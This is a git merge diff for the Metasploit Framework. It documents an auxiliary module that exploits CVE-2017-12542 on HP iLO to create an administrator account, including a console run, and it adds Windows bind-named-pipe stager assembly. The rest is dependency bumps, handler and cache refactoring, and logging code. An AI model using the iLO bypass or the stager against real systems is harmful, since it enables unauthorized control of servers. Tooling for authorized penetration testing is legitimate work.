Merge branch 'rapid7/master' into goliath
commit
6b3a4a56dc
14
Gemfile.lock
14
Gemfile.lock
|
@ -110,7 +110,7 @@ GEM
|
||||||
backports (3.11.1)
|
backports (3.11.1)
|
||||||
bcrypt (3.1.11)
|
bcrypt (3.1.11)
|
||||||
bcrypt_pbkdf (1.0.0)
|
bcrypt_pbkdf (1.0.0)
|
||||||
bindata (2.4.2)
|
bindata (2.4.3)
|
||||||
bit-struct (0.16)
|
bit-struct (0.16)
|
||||||
builder (3.2.3)
|
builder (3.2.3)
|
||||||
coderay (1.1.2)
|
coderay (1.1.2)
|
||||||
|
@ -119,7 +119,7 @@ GEM
|
||||||
daemons (1.2.4)
|
daemons (1.2.4)
|
||||||
diff-lcs (1.3)
|
diff-lcs (1.3)
|
||||||
dnsruby (1.60.2)
|
dnsruby (1.60.2)
|
||||||
docile (1.1.5)
|
docile (1.3.0)
|
||||||
erubis (2.7.0)
|
erubis (2.7.0)
|
||||||
eventmachine (1.2.3)
|
eventmachine (1.2.3)
|
||||||
factory_girl (4.9.0)
|
factory_girl (4.9.0)
|
||||||
|
@ -159,7 +159,7 @@ GEM
|
||||||
logging (2.2.2)
|
logging (2.2.2)
|
||||||
little-plugger (~> 1.1)
|
little-plugger (~> 1.1)
|
||||||
multi_json (~> 1.10)
|
multi_json (~> 1.10)
|
||||||
loofah (2.2.0)
|
loofah (2.2.2)
|
||||||
crass (~> 1.0.2)
|
crass (~> 1.0.2)
|
||||||
nokogiri (>= 1.5.9)
|
nokogiri (>= 1.5.9)
|
||||||
memoist (0.16.0)
|
memoist (0.16.0)
|
||||||
|
@ -252,7 +252,7 @@ GEM
|
||||||
activesupport (= 4.2.10)
|
activesupport (= 4.2.10)
|
||||||
rake (>= 0.8.7)
|
rake (>= 0.8.7)
|
||||||
thor (>= 0.18.1, < 2.0)
|
thor (>= 0.18.1, < 2.0)
|
||||||
rake (12.3.0)
|
rake (12.3.1)
|
||||||
rb-readline (0.5.5)
|
rb-readline (0.5.5)
|
||||||
recog (2.1.18)
|
recog (2.1.18)
|
||||||
nokogiri
|
nokogiri
|
||||||
|
@ -293,7 +293,7 @@ GEM
|
||||||
metasm
|
metasm
|
||||||
rex-core
|
rex-core
|
||||||
rex-text
|
rex-text
|
||||||
rex-socket (0.1.10)
|
rex-socket (0.1.12)
|
||||||
rex-core
|
rex-core
|
||||||
rex-sslscan (0.1.5)
|
rex-sslscan (0.1.5)
|
||||||
rex-core
|
rex-core
|
||||||
|
@ -343,8 +343,8 @@ GEM
|
||||||
faraday (~> 0.9)
|
faraday (~> 0.9)
|
||||||
jwt (>= 1.5, < 3.0)
|
jwt (>= 1.5, < 3.0)
|
||||||
multi_json (~> 1.10)
|
multi_json (~> 1.10)
|
||||||
simplecov (0.15.1)
|
simplecov (0.16.1)
|
||||||
docile (~> 1.1.0)
|
docile (~> 1.1)
|
||||||
json (>= 1.8, < 3)
|
json (>= 1.8, < 3)
|
||||||
simplecov-html (~> 0.10.0)
|
simplecov-html (~> 0.10.0)
|
||||||
simplecov-html (0.10.2)
|
simplecov-html (0.10.2)
|
||||||
|
|
Binary file not shown.
|
@ -0,0 +1,42 @@
|
||||||
|
This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, which is 100% stable when exploited this way, to create an arbitrary administrator account.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start `msfconsole`
|
||||||
|
2. `use auxiliary/admin/hp/hp_ilo_create_admin_account`
|
||||||
|
3. Set `RHOST`
|
||||||
|
4. run `check` to check if remote host is vulnerable (module tries to list accounts using the REST API)
|
||||||
|
5. Set `USERNAME` and `PASSWORD` to specify a new administrator account credentials
|
||||||
|
6. run `run` to actually create the account on the iLO
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**USERNAME**
|
||||||
|
|
||||||
|
The username of the new administrator account. Defaults to a random string.
|
||||||
|
|
||||||
|
**PASSWORD**
|
||||||
|
|
||||||
|
The password of the new administrator account. Defaults to a random string.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### New administrator account creation
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/admin/hp/hp_ilo_create_admin_account
|
||||||
|
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set RHOST 192.168.42.78
|
||||||
|
RHOST => 192.168.42.78
|
||||||
|
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > check
|
||||||
|
[+] 192.168.42.78:443 The target is vulnerable.
|
||||||
|
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set USERNAME test_user
|
||||||
|
USERNAME => test_user
|
||||||
|
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set PASSWORD test_password
|
||||||
|
PASSWORD => test_password
|
||||||
|
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run
|
||||||
|
|
||||||
|
[*] Trying to create account test_user...
|
||||||
|
[+] Account test_user/test_password created successfully.
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(admin/hp/hp_ilo_create_admin_account) >
|
||||||
|
```
|
|
@ -146,6 +146,33 @@ module Metasploit
|
||||||
self.verbosity = :fatal if self.verbosity.nil?
|
self.verbosity = :fatal if self.verbosity.nil?
|
||||||
end
|
end
|
||||||
|
|
||||||
|
public
|
||||||
|
|
||||||
|
def get_platform(proof)
|
||||||
|
case proof
|
||||||
|
when /Linux/
|
||||||
|
'linux'
|
||||||
|
when /Darwin/
|
||||||
|
'osx'
|
||||||
|
when /SunOS/
|
||||||
|
'solaris'
|
||||||
|
when /BSD/
|
||||||
|
'bsd'
|
||||||
|
when /HP-UX/
|
||||||
|
'hpux'
|
||||||
|
when /AIX/
|
||||||
|
'aix'
|
||||||
|
when /Win32|Windows/
|
||||||
|
'windows'
|
||||||
|
when /Unknown command or computer name/
|
||||||
|
'cisco-ios'
|
||||||
|
when /unknown keyword/ # ScreenOS
|
||||||
|
'juniper'
|
||||||
|
when /JUNOS Base OS/ #JunOS
|
||||||
|
'juniper'
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -9,6 +9,7 @@ require 'rex/proto/smb/simpleclient'
|
||||||
# 1) A peek named pipe operation is carried out before every read to prevent blocking. This
|
# 1) A peek named pipe operation is carried out before every read to prevent blocking. This
|
||||||
# generates extra traffic. SMB echo requests are also generated to force the packet
|
# generates extra traffic. SMB echo requests are also generated to force the packet
|
||||||
# dispatcher to perform a read.
|
# dispatcher to perform a read.
|
||||||
|
# 2) SMB1 only. Switch to ruby_smb.
|
||||||
#
|
#
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -23,21 +24,23 @@ require 'rex/proto/smb/simpleclient'
|
||||||
# A peek operation on the pipe fixes this.
|
# A peek operation on the pipe fixes this.
|
||||||
#
|
#
|
||||||
class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
|
class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
|
||||||
attr_accessor :mutex, :last_comm, :write_queue, :write_thread, :read_buff, :echo_thread, :server_max_buffer_size
|
attr_accessor :mutex, :last_comm, :write_queue, :write_thread, :read_buff, :echo_thread, :simple, :server_max_buffer_size
|
||||||
|
|
||||||
STATUS_BUFFER_OVERFLOW = 0x80000005
|
STATUS_BUFFER_OVERFLOW = 0x80000005
|
||||||
|
STATUS_PIPE_BROKEN = 0xc000014b
|
||||||
|
|
||||||
def initialize(*args, server_max_buffer_size:)
|
def initialize(*args, simple:, server_max_buffer_size:)
|
||||||
super(*args)
|
super(*args)
|
||||||
self.client = args[0]
|
self.simple = simple
|
||||||
|
self.client = simple.client
|
||||||
self.mutex = Mutex.new # synchronize read/writes
|
self.mutex = Mutex.new # synchronize read/writes
|
||||||
self.last_comm = Time.now # last successfull read/write
|
self.last_comm = Time.now # last successfull read/write
|
||||||
self.write_queue = Queue.new # queue message to send
|
self.write_queue = Queue.new # messages to send
|
||||||
self.write_thread = Thread.new { dispatcher }
|
self.write_thread = Thread.new { dispatcher }
|
||||||
self.echo_thread = Thread.new { force_read }
|
self.echo_thread = Thread.new { force_read }
|
||||||
self.read_buff = ''
|
self.read_buff = ''
|
||||||
self.server_max_buffer_size = server_max_buffer_size
|
self.server_max_buffer_size = server_max_buffer_size # max transaction size
|
||||||
self.chunk_size = server_max_buffer_size - 260
|
self.chunk_size = server_max_buffer_size - 260 # max read/write size
|
||||||
end
|
end
|
||||||
|
|
||||||
# Check if there are any bytes to read and return number available. Access must be synchronized.
|
# Check if there are any bytes to read and return number available. Access must be synchronized.
|
||||||
|
@ -46,6 +49,9 @@ class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
|
||||||
setup = [0x23, self.file_id].pack('vv')
|
setup = [0x23, self.file_id].pack('vv')
|
||||||
# Must ignore errors since we expect STATUS_BUFFER_OVERFLOW
|
# Must ignore errors since we expect STATUS_BUFFER_OVERFLOW
|
||||||
pkt = self.client.trans_maxzero('\\PIPE\\', '', '', 2, setup, false, true, true)
|
pkt = self.client.trans_maxzero('\\PIPE\\', '', '', 2, setup, false, true, true)
|
||||||
|
if pkt['Payload']['SMB'].v['ErrorClass'] == STATUS_PIPE_BROKEN
|
||||||
|
raise IOError
|
||||||
|
end
|
||||||
avail = 0
|
avail = 0
|
||||||
begin
|
begin
|
||||||
avail = pkt.to_s[pkt['Payload'].v['ParamOffset']+4, 2].unpack('v')[0]
|
avail = pkt.to_s[pkt['Payload'].v['ParamOffset']+4, 2].unpack('v')[0]
|
||||||
|
@ -80,7 +86,7 @@ class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
|
||||||
# Runs as a thread and synchronizes writes. Allows write operations to return
|
# Runs as a thread and synchronizes writes. Allows write operations to return
|
||||||
# immediately instead of waiting for the mutex.
|
# immediately instead of waiting for the mutex.
|
||||||
def dispatcher
|
def dispatcher
|
||||||
while true
|
while not self.write_queue.closed?
|
||||||
data = self.write_queue.pop
|
data = self.write_queue.pop
|
||||||
self.mutex.synchronize do
|
self.mutex.synchronize do
|
||||||
sent = 0
|
sent = 0
|
||||||
|
@ -98,40 +104,38 @@ class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
|
||||||
# Intercepts the socket.close from the session manager when the session dies.
|
# Intercepts the socket.close from the session manager when the session dies.
|
||||||
# Cleanly terminates the SMB session and closes the socket.
|
# Cleanly terminates the SMB session and closes the socket.
|
||||||
def close
|
def close
|
||||||
|
self.echo_thread.kill rescue nil
|
||||||
# Give the meterpreter shutdown command a chance
|
# Give the meterpreter shutdown command a chance
|
||||||
self.write_queue.close
|
self.write_queue.close
|
||||||
if self.write_queue.size > 0
|
|
||||||
sleep(1.0)
|
|
||||||
end
|
|
||||||
self.write_thread.kill
|
|
||||||
|
|
||||||
begin
|
begin
|
||||||
# close pipe
|
if self.write_thread.join(2.0)
|
||||||
super
|
self.write_thread.kill
|
||||||
rescue => e
|
end
|
||||||
|
rescue
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# close pipe, share, and socket
|
||||||
|
super rescue nil
|
||||||
|
self.simple.disconnect(self.simple.last_share) rescue nil
|
||||||
self.client.socket.close
|
self.client.socket.close
|
||||||
end
|
end
|
||||||
|
|
||||||
def read(count)
|
def read(count)
|
||||||
data = ''
|
data = ''
|
||||||
begin
|
if count > self.read_buff.length
|
||||||
if count > self.read_buff.length
|
# need more data to satisfy request
|
||||||
# need more data to satisfy request
|
self.mutex.synchronize do
|
||||||
self.mutex.synchronize do
|
avail = peek_named_pipe
|
||||||
avail = peek_named_pipe
|
if avail > 0
|
||||||
if avail > 0
|
left = [count-self.read_buff.length, avail].max
|
||||||
left = [count-self.read_buff.length, avail].max
|
while left > 0
|
||||||
while left > 0
|
buff = super([left, self.chunk_size].min)
|
||||||
buff = super([left, self.chunk_size].min)
|
self.last_comm = Time.now
|
||||||
self.last_comm = Time.now
|
left -= buff.length
|
||||||
left -= buff.length
|
self.read_buff += buff
|
||||||
self.read_buff += buff
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
rescue
|
|
||||||
end
|
end
|
||||||
|
|
||||||
data = self.read_buff[0, [count, self.read_buff.length].min]
|
data = self.read_buff[0, [count, self.read_buff.length].min]
|
||||||
|
@ -190,7 +194,8 @@ class SimpleClientPipe < Rex::Proto::SMB::SimpleClient
|
||||||
def create_pipe(path)
|
def create_pipe(path)
|
||||||
pkt = self.client.create_pipe(path, Rex::Proto::SMB::Constants::CREATE_ACCESS_EXIST)
|
pkt = self.client.create_pipe(path, Rex::Proto::SMB::Constants::CREATE_ACCESS_EXIST)
|
||||||
file_id = pkt['Payload'].v['FileID']
|
file_id = pkt['Payload'].v['FileID']
|
||||||
self.pipe = OpenPipeSock.new(self.client, path, self.client.last_tree_id, file_id, server_max_buffer_size: self.server_max_buffer_size)
|
self.pipe = OpenPipeSock.new(self.client, path, self.client.last_tree_id, file_id, simple: self,
|
||||||
|
server_max_buffer_size: self.server_max_buffer_size)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -202,7 +207,7 @@ module Msf
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns the string representation of the handler type, in this case
|
# Returns the string representation of the handler type, in this case
|
||||||
# 'reverse_named_pipe'.
|
# 'bind_named_pipe'.
|
||||||
#
|
#
|
||||||
def self.handler_type
|
def self.handler_type
|
||||||
"bind_named_pipe"
|
"bind_named_pipe"
|
||||||
|
@ -210,15 +215,15 @@ module Msf
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns the connection-described general handler type, in this case
|
# Returns the connection-described general handler type, in this case
|
||||||
# 'reverse'.
|
# 'bind'.
|
||||||
#
|
#
|
||||||
def self.general_handler_type
|
def self.general_handler_type
|
||||||
"bind"
|
"bind"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Initializes the reverse handler and ads the options that are required
|
# Initializes the handler and ads the options that are required for
|
||||||
# for reverse named pipe payloads.
|
# bind named pipe payloads.
|
||||||
#
|
#
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super
|
super
|
||||||
|
@ -334,7 +339,7 @@ module Msf
|
||||||
print_error("Failed to connect to pipe #{smbshare}")
|
print_error("Failed to connect to pipe #{smbshare}")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
vprint_status("Opened pipe \\#{pipe_name}")
|
vprint_status("Opened pipe \\#{pipe_name}")
|
||||||
|
|
||||||
# Increment the has connection counter
|
# Increment the has connection counter
|
||||||
|
|
|
@ -1,8 +1,43 @@
|
||||||
import json
|
import json
|
||||||
|
import logging
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
class LogFormatter(logging.Formatter):
|
||||||
|
def __init__(self, prefix, *args, **kwargs):
|
||||||
|
super(LogFormatter, self).__init__(*args, **kwargs)
|
||||||
|
self.prefix = prefix
|
||||||
|
|
||||||
|
def format(self, record):
|
||||||
|
return self.prefix + record.msg
|
||||||
|
|
||||||
|
|
||||||
|
class LogHandler(logging.Handler):
|
||||||
|
def emit(self, record):
|
||||||
|
level = 'debug'
|
||||||
|
if record.levelno >= logging.ERROR:
|
||||||
|
level = 'error'
|
||||||
|
elif record.levelno >= logging.WARNING:
|
||||||
|
level = 'warning'
|
||||||
|
elif record.levelno >= logging.INFO:
|
||||||
|
level = 'info'
|
||||||
|
log(self.format(record), level)
|
||||||
|
return
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def setup(cls, level=logging.DEBUG, name=None, msg_prefix=None):
|
||||||
|
logger = logging.getLogger(name)
|
||||||
|
handler = cls()
|
||||||
|
|
||||||
|
if level is not None:
|
||||||
|
logger.setLevel(level)
|
||||||
|
if msg_prefix is not None:
|
||||||
|
handler.setFormatter(LogFormatter(msg_prefix))
|
||||||
|
logger.addHandler(handler)
|
||||||
|
return handler
|
||||||
|
|
||||||
|
|
||||||
def log(message, level='info'):
|
def log(message, level='info'):
|
||||||
rpc_send({'jsonrpc': '2.0', 'method': 'message', 'params': {
|
rpc_send({'jsonrpc': '2.0', 'method': 'message', 'params': {
|
||||||
'level': level,
|
'level': level,
|
||||||
|
|
|
@ -13,9 +13,9 @@ class Msf::Modules::External::Shim
|
||||||
capture_server(mod)
|
capture_server(mod)
|
||||||
when 'dos'
|
when 'dos'
|
||||||
dos(mod)
|
dos(mod)
|
||||||
when 'scanner.single'
|
when 'single_scanner'
|
||||||
single_scanner(mod)
|
single_scanner(mod)
|
||||||
when 'scanner.multi'
|
when 'multi_scanner'
|
||||||
multi_scanner(mod)
|
multi_scanner(mod)
|
||||||
else
|
else
|
||||||
# TODO have a nice load error show up in the logs
|
# TODO have a nice load error show up in the logs
|
||||||
|
|
|
@ -16,12 +16,13 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
})
|
})
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
|
OptInt.new('batch_size', [false, 'Number of hosts to run in each batch', 200]),
|
||||||
<%= meta[:options] %>
|
<%= meta[:options] %>
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_batch_size
|
def run_batch_size
|
||||||
200
|
datastore['batch_size']
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_batch(ips)
|
def run_batch(ips)
|
||||||
|
|
|
@ -24,17 +24,21 @@ class Cache
|
||||||
# Refreshes cached module metadata as well as updating the store
|
# Refreshes cached module metadata as well as updating the store
|
||||||
#
|
#
|
||||||
def refresh_metadata_instance(module_instance)
|
def refresh_metadata_instance(module_instance)
|
||||||
dlog "Refreshing #{module_instance.refname} of type: #{module_instance.type}"
|
@mutex.synchronize {
|
||||||
refresh_metadata_instance_internal(module_instance)
|
dlog "Refreshing #{module_instance.refname} of type: #{module_instance.type}"
|
||||||
update_store
|
refresh_metadata_instance_internal(module_instance)
|
||||||
|
update_store
|
||||||
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns the module data cache, but first ensures all the metadata is loaded
|
# Returns the module data cache, but first ensures all the metadata is loaded
|
||||||
#
|
#
|
||||||
def get_metadata
|
def get_metadata
|
||||||
wait_for_load
|
@mutex.synchronize {
|
||||||
@module_metadata_cache.values
|
wait_for_load
|
||||||
|
@module_metadata_cache.values
|
||||||
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -42,41 +46,47 @@ class Cache
|
||||||
# if there are changes.
|
# if there are changes.
|
||||||
#
|
#
|
||||||
def refresh_metadata(module_sets)
|
def refresh_metadata(module_sets)
|
||||||
unchanged_module_references = get_unchanged_module_references
|
@mutex.synchronize {
|
||||||
has_changes = false
|
unchanged_module_references = get_unchanged_module_references
|
||||||
module_sets.each do |mt|
|
has_changes = false
|
||||||
unchanged_reference_name_set = unchanged_module_references[mt[0]]
|
module_sets.each do |mt|
|
||||||
|
unchanged_reference_name_set = unchanged_module_references[mt[0]]
|
||||||
|
|
||||||
mt[1].keys.sort.each do |mn|
|
mt[1].keys.sort.each do |mn|
|
||||||
next if unchanged_reference_name_set.include? mn
|
next if unchanged_reference_name_set.include? mn
|
||||||
|
|
||||||
begin
|
begin
|
||||||
module_instance = mt[1].create(mn)
|
module_instance = mt[1].create(mn)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
elog "Unable to create module: #{mn}. #{e.message}"
|
elog "Unable to create module: #{mn}. #{e.message}"
|
||||||
end
|
|
||||||
|
|
||||||
unless module_instance
|
|
||||||
wlog "Removing invalid module reference from cache: #{mn}"
|
|
||||||
existed = remove_from_cache(mn)
|
|
||||||
if existed
|
|
||||||
has_changes = true
|
|
||||||
end
|
end
|
||||||
next
|
|
||||||
end
|
|
||||||
|
|
||||||
begin
|
unless module_instance
|
||||||
refresh_metadata_instance_internal(module_instance)
|
wlog "Removing invalid module reference from cache: #{mn}"
|
||||||
has_changes = true
|
existed = remove_from_cache(mn)
|
||||||
rescue Exception => e
|
if existed
|
||||||
elog("Error updating module details for #{module_instance.fullname}: #{$!.class} #{$!} : #{e.message}")
|
has_changes = true
|
||||||
|
end
|
||||||
|
next
|
||||||
|
end
|
||||||
|
|
||||||
|
begin
|
||||||
|
refresh_metadata_instance_internal(module_instance)
|
||||||
|
has_changes = true
|
||||||
|
rescue Exception => e
|
||||||
|
elog("Error updating module details for #{module_instance.fullname}: #{$!.class} #{$!} : #{e.message}")
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
update_store if has_changes
|
update_store if has_changes
|
||||||
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#######
|
||||||
|
private
|
||||||
|
#######
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns a hash(type->set) which references modules that have not changed.
|
# Returns a hash(type->set) which references modules that have not changed.
|
||||||
#
|
#
|
||||||
|
@ -102,10 +112,6 @@ class Cache
|
||||||
return skip_reference_name_set_by_module_type
|
return skip_reference_name_set_by_module_type
|
||||||
end
|
end
|
||||||
|
|
||||||
#######
|
|
||||||
private
|
|
||||||
#######
|
|
||||||
|
|
||||||
def remove_from_cache(module_name)
|
def remove_from_cache(module_name)
|
||||||
old_cache_size = @module_metadata_cache.size
|
old_cache_size = @module_metadata_cache.size
|
||||||
@module_metadata_cache.delete_if {|_, module_metadata|
|
@module_metadata_cache.delete_if {|_, module_metadata|
|
||||||
|
@ -140,6 +146,7 @@ class Cache
|
||||||
end
|
end
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
|
@mutex = Mutex.new
|
||||||
@module_metadata_cache = {}
|
@module_metadata_cache = {}
|
||||||
@store_loaded = false
|
@store_loaded = false
|
||||||
@console = Rex::Ui::Text::Output::Stdio.new
|
@console = Rex::Ui::Text::Output::Stdio.new
|
||||||
|
|
|
@ -19,6 +19,10 @@ module Msf::Modules::Metadata::Store
|
||||||
load_metadata
|
load_metadata
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#######
|
||||||
|
private
|
||||||
|
#######
|
||||||
|
|
||||||
#
|
#
|
||||||
# Update the module meta cache disk store
|
# Update the module meta cache disk store
|
||||||
#
|
#
|
||||||
|
@ -32,10 +36,6 @@ module Msf::Modules::Metadata::Store
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#######
|
|
||||||
private
|
|
||||||
#######
|
|
||||||
|
|
||||||
def load_metadata
|
def load_metadata
|
||||||
begin
|
begin
|
||||||
retries ||= 0
|
retries ||= 0
|
||||||
|
|
|
@ -0,0 +1,349 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/payload/transport_config'
|
||||||
|
require 'msf/core/payload/windows/send_uuid'
|
||||||
|
require 'msf/core/payload/windows/block_api'
|
||||||
|
require 'msf/core/payload/windows/exitfunk'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# bind_named_pipe payload generation for Windows ARCH_X86
|
||||||
|
#
|
||||||
|
###
|
||||||
|
module Payload::Windows::BindNamedPipe
|
||||||
|
|
||||||
|
include Msf::Payload::TransportConfig
|
||||||
|
include Msf::Payload::Windows
|
||||||
|
include Msf::Payload::Windows::SendUUID
|
||||||
|
include Msf::Payload::Windows::BlockApi
|
||||||
|
include Msf::Payload::Windows::Exitfunk
|
||||||
|
|
||||||
|
#
|
||||||
|
# Register bind_named_pipe specific options
|
||||||
|
#
|
||||||
|
def initialize(*args)
|
||||||
|
super
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptInt.new('WAIT_TIMEOUT', [false, 'Seconds pipe will wait for a connection', 10])
|
||||||
|
]
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generate the first stage
|
||||||
|
#
|
||||||
|
def generate
|
||||||
|
conf = {
|
||||||
|
name: datastore['PIPENAME'],
|
||||||
|
host: datastore['PIPEHOST'],
|
||||||
|
timeout: datastore['WAIT_TIMEOUT'],
|
||||||
|
reliable: false,
|
||||||
|
}
|
||||||
|
|
||||||
|
# Generate the advanced stager if we have space
|
||||||
|
unless self.available_space.nil? || required_space > self.available_space
|
||||||
|
conf[:reliable] = true
|
||||||
|
conf[:exitfunk] = datastore['EXITFUNC']
|
||||||
|
end
|
||||||
|
|
||||||
|
generate_bind_named_pipe(conf)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# By default, we don't want to send the UUID, but we'll send
|
||||||
|
# for certain payloads if requested.
|
||||||
|
#
|
||||||
|
def include_send_uuid
|
||||||
|
false
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generate and compile the stager
|
||||||
|
#
|
||||||
|
def generate_bind_named_pipe(opts={})
|
||||||
|
combined_asm = %Q^
|
||||||
|
cld ; Clear the direction flag.
|
||||||
|
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||||
|
#{asm_block_api}
|
||||||
|
start:
|
||||||
|
pop ebp ; block API pointer
|
||||||
|
#{asm_bind_named_pipe(opts)}
|
||||||
|
^
|
||||||
|
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||||
|
end
|
||||||
|
|
||||||
|
def transport_config(opts={})
|
||||||
|
transport_config_bind_named_pipe(opts)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Determine the maximum amount of space required for the features requested
|
||||||
|
#
|
||||||
|
def required_space
|
||||||
|
# Start with our cached default generated size
|
||||||
|
space = cached_size
|
||||||
|
|
||||||
|
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
|
||||||
|
space += 31
|
||||||
|
|
||||||
|
# Reliability adds bytes! +56 if exitfunk, otherwise +90
|
||||||
|
#space += 56
|
||||||
|
space += 90
|
||||||
|
|
||||||
|
space += uuid_required_size if include_send_uuid
|
||||||
|
|
||||||
|
# The final estimated size
|
||||||
|
space
|
||||||
|
end
|
||||||
|
|
||||||
|
def uuid_required_size
|
||||||
|
# TODO update this
|
||||||
|
space = 0
|
||||||
|
|
||||||
|
# UUID size
|
||||||
|
space += 16
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# hPipe must be in edi. eax will contain WriteFile return value
|
||||||
|
#
|
||||||
|
def asm_send_uuid(uuid=nil)
|
||||||
|
uuid ||= generate_payload_uuid
|
||||||
|
uuid_raw = uuid.to_raw
|
||||||
|
|
||||||
|
asm << %Q^
|
||||||
|
send_uuid:
|
||||||
|
push 0 ; lpNumberOfBytesWritten
|
||||||
|
push esp
|
||||||
|
push #{uuid_raw.length} ; nNumberOfBytesToWrite
|
||||||
|
call get_uuid_address ; put uuid buffer on the stack
|
||||||
|
db #{raw_to_db(uuid_raw)} ; lpBuffer
|
||||||
|
get_uuid_address:
|
||||||
|
push edi : hPipe
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
|
||||||
|
call ebp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
|
||||||
|
^
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generate an assembly stub with the configured feature set and options.
|
||||||
|
#
|
||||||
|
# @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
|
||||||
|
# @option opts [Bool] :reliable Whether or not to enable error handling code
|
||||||
|
# @option opts [String] :name Pipe name to create
|
||||||
|
# @option opts [Int] :timeout Seconds to wait for pipe connection
|
||||||
|
#
|
||||||
|
def asm_bind_named_pipe(opts={})
|
||||||
|
|
||||||
|
reliable = opts[:reliable]
|
||||||
|
timeout = opts[:timeout] * 1000 # convert to millisecs
|
||||||
|
retry_wait = 500
|
||||||
|
retry_count = timeout / retry_wait
|
||||||
|
full_pipe_name = "\\\\\\\\.\\\\pipe\\\\#{opts[:name]}" # double escape -> \\.\pipe\name
|
||||||
|
chunk_size = 0x10000 # pipe buffer size
|
||||||
|
cleanup_funk = reliable ? 'cleanup_file' : 'failure'
|
||||||
|
pipe_mode = 1 # (PIPE_TYPE_BYTE|PIPE_NOWAIT|PIPE_READMODE_BYTE)
|
||||||
|
|
||||||
|
asm = %Q^
|
||||||
|
create_named_pipe:
|
||||||
|
push 0 ; lpSecurityAttributes. Default r/w for creator and administrators
|
||||||
|
push 0 ; nDefaultTimeOut
|
||||||
|
push #{chunk_size} ; nInBufferSize
|
||||||
|
push #{chunk_size} ; nOutBufferSize
|
||||||
|
push 255 ; nMaxInstances (PIPE_UNLIMITED_INSTANCES). in case pipe isn't released
|
||||||
|
push #{pipe_mode} ; dwPipeMode
|
||||||
|
push 3 ; dwOpenMode (PIPE_ACCESS_DUPLEX)
|
||||||
|
call get_pipe_name ; lpName
|
||||||
|
db "#{full_pipe_name}", 0x00
|
||||||
|
get_pipe_name:
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
|
||||||
|
call ebp ; CreateNamedPipeA(lpName, dwOpenMode, dwPipeMode, nMaxInstances, nOutBufferSize,
|
||||||
|
; nInBufferSize, nDefaultTimeOut, lpSecurityAttributes)
|
||||||
|
mov edi, eax ; save hPipe (using sockedi convention)
|
||||||
|
|
||||||
|
; check for failure
|
||||||
|
cmp eax, -1 ; did it work? (INVALID_HANDLE_VALUE)
|
||||||
|
jz failure
|
||||||
|
|
||||||
|
; initialize retry counter
|
||||||
|
push #{retry_count} ; retry counter
|
||||||
|
pop esi
|
||||||
|
|
||||||
|
; Connect pipe to remote
|
||||||
|
connect_pipe:
|
||||||
|
push 0 ; lpOverlapped
|
||||||
|
push edi ; hPipe
